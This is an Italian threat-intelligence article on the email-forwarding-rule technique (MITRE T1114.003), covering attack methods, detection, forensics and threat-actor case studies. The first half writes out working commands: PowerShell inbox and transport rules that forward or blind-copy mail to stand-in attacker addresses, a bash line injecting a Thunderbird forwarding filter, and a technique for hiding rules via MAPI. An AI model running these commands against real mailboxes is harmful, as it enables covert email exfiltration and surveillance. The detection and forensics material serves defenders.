Intercettazione Email: Email Forwarding Rule (T1114.003)

Per comprendere la minaccia, iniziamo con la creazione di una regola di inoltro tramite PowerShell in ambiente Exchange. Il comando base è sorprendentemente semplice:

New-InboxRule -Name "Legitimate Rule" -ForwardTo "attacker@external.com" -StopProcessingRules $true

Questa singola riga crea una regola che inoltra tutte le email in arrivo all'indirizzo specificato. L'opzione StopProcessingRules impedisce l'elaborazione di altre regole successive, garantendo che l'inoltro avvenga sempre.

Per un approccio più sofisticato che replica le tattiche di LAPSUS$, possiamo creare regole di trasporto a livello tenant che intercettano tutte le comunicazioni dell'organizzazione:

New-TransportRule -Name "Compliance Archive" -SentToScope InOrganization -BlindCopyTo "monitor@attacker.com"

Questa regola opera a livello superiore rispetto alle regole mailbox individuali e può essere particolarmente difficile da individuare per utenti non amministratori.

Su sistemi Linux con Thunderbird, la manipolazione avviene modificando il file msgFilterRules.dat. Per automatizzare l'attacco, uno script bash può inserire regole di inoltro:

echo 'name="Forward All"
enabled="yes"
type="17"
action="Forward"
actionValue="attacker@external.com"' >> ~/.thunderbird/*/ImapMail/*/msgFilterRules.dat

Per nascondere la regola utilizzando MAPI, il metodo preferito da Star Blizzard, richiede l'uso di strumenti come MFCMAPI o EWSEditor. Questi permettono di modificare direttamente le proprietà PR_RULE_MSG_STATE e PR_RULE_MSG_PROVIDER, rendendo la regola invisibile alle interfacce standard.

L'automazione dell'attacco può includere la creazione di regole condizionali che si attivano solo per mittenti specifici, riducendo il rumore e aumentando la persistenza:

New-InboxRule -Name "Project Updates" -From "ceo@company.com" -ForwardTo "collector@attacker.com" -DeleteMessage $true

La detection efficace richiede un approccio multilivello che combini il monitoraggio dei comandi PowerShell con l'analisi comportamentale delle mailbox. Il primo indicatore chiave è l'esecuzione di cmdlet specifici.

Configura il monitoraggio per EventCode 4104 nei log PowerShell, cercando pattern come "New-InboxRule", "Set-InboxRule" e "New-TransportRule". Questi comandi generano tracce distintive che possono essere correlate con l'attività utente normale.

Un approccio comportamentale più sofisticato monitora le anomalie nel flusso email. Quando una mailbox inizia improvvisamente a inoltrare volumi significativi verso domini esterni, specialmente se mai contattati prima, genera un alert di priorità alta. La correlazione temporale è fondamentale: una nuova regola seguita da inoltri massicci entro 15-30 minuti indica attività malevola.

Per Exchange Online, l'integrazione con Microsoft 365 Unified Audit Log fornisce visibilità granulare. Query come questa identificano creazioni sospette:

Search-UnifiedAuditLog -Operations "New-InboxRule" -StartDate (Get-Date).AddDays(-7) | 
Where-Object {$_.AuditData -like "*ForwardTo*external.com*"}

La gestione dei falsi positivi richiede la creazione di baseline per utenti amministrativi e account di servizio che legittimamente creano regole. Mantieni una whitelist dinamica di domini di inoltro autorizzati, aggiornata mensilmente dal team di sicurezza.

Per rilevare regole nascoste via MAPI, implementa script schedulati che utilizzano EWS Managed API per enumerare tutte le regole, confrontandole con quelle visibili nelle interfacce standard. Discrepanze indicano manipolazione avanzata.

L'analisi forense delle regole di inoltro email richiede l'esame di molteplici artefatti distribuiti tra client e server. Su sistemi Windows con Outlook, il file principale è il database OST/PST che contiene le regole locali.

Le regole vengono memorizzate nella cartella nascosta "Deferred Action Messages" all'interno del file PST. Utilizza strumenti come libpff o commercial PST viewers per estrarre e analizzare queste strutture. Ogni regola contiene timestamp di creazione e modifica che aiutano a ricostruire la timeline.

Nel registro di Windows, le chiavi sotto HKCU\Software\Microsoft\Office\Outlook\Settings possono contenere riferimenti a regole create programmaticamente. La correlazione con i log di autenticazione Exchange aiuta a identificare il momento esatto della compromissione.

Per ambienti Linux, i file di configurazione Thunderbird in ~/.thunderbird//ImapMail//msgFilterRules.dat contengono regole in formato testo. La presenza di timestamp nei file di backup (.bak) fornisce indicazioni temporali preziose. Il comando stat rivela tempi di modifica che possono essere correlati con altri indicatori.

Nei casi documentati di Silent Librarian, l'analisi forense ha rivelato pattern distintivi: creazione di regole entro 24-48 ore dalla compromissione iniziale, seguita da periodi di inattività per evitare detection. Le regole spesso includevano filtri per parole chiave come "password", "confidential" o "invoice".

L'analisi dei Message Tracking Logs di Exchange fornisce la prova definitiva dell'esfiltrazione. Query PowerShell mirate possono ricostruire l'intero flusso di dati:

Get-MessageTrackingLog -EventId DELIVER -ResultSize Unlimited | Where-Object {$_.Recipients -like "attacker.com"}

Kimsuky rappresenta il caso di studio principale per questa tecnica, con operazioni documentate dal 2018. Il gruppo nordcoreano predilige la creazione di regole altamente mirate su account di ricercatori e funzionari governativi, focalizzandosi su comunicazioni relative a politiche della penisola coreana.

Star Blizzard, precedentemente noto come SEABORGIUM, ha elevato la tecnica a livello artistico. Le loro campagne mostrano l'uso sistematico di regole MAPI nascoste, mantenute attive per mesi anche dopo il reset delle credenziali. Il gruppo russo si distingue per la patience nell'attendere comunicazioni di alto valore prima di agire.

LAPSUS$ ha introdotto l'innovazione delle regole tenant-wide, dimostrando come un singolo account amministrativo compromesso possa fornire visibilità sull'intera organizzazione. La loro velocità operativa - dalla compromissione all'esfiltrazione in meno di 48 ore - richiede response time estremamente rapidi.

L'analisi dei pattern geografici mostra concentrazioni specifiche: gruppi est-europei e russi preferiscono regole nascoste MAPI, mentre attori APT asiatici utilizzano approcci più diretti con regole visibili ma camuffate con nomi legittimi. Scattered Spider ha dimostrato l'evoluzione verso l'automazione, utilizzando script per creare simultaneamente regole su decine di account compromessi.

Le previsioni indicano un'evoluzione verso l'abuso di API cloud native e l'integrazione con tecniche di persistence più sofisticate. L'overlap negli strumenti mostra convergenza verso framework di automazione comuni, suggerendo la necessità di detection behavior-based piuttosto che signature-based.

Tecnica documentata nel framework MITRE ATT&CK come T1114.003. Riferimenti alle campagne di Kimsuky, Silent Librarian, LAPSUS$, Scattered Spider e Star Blizzard derivano da report di threat intelligence pubblici. Detection patterns basati su telemetria Exchange e Microsoft 365 unified audit logs.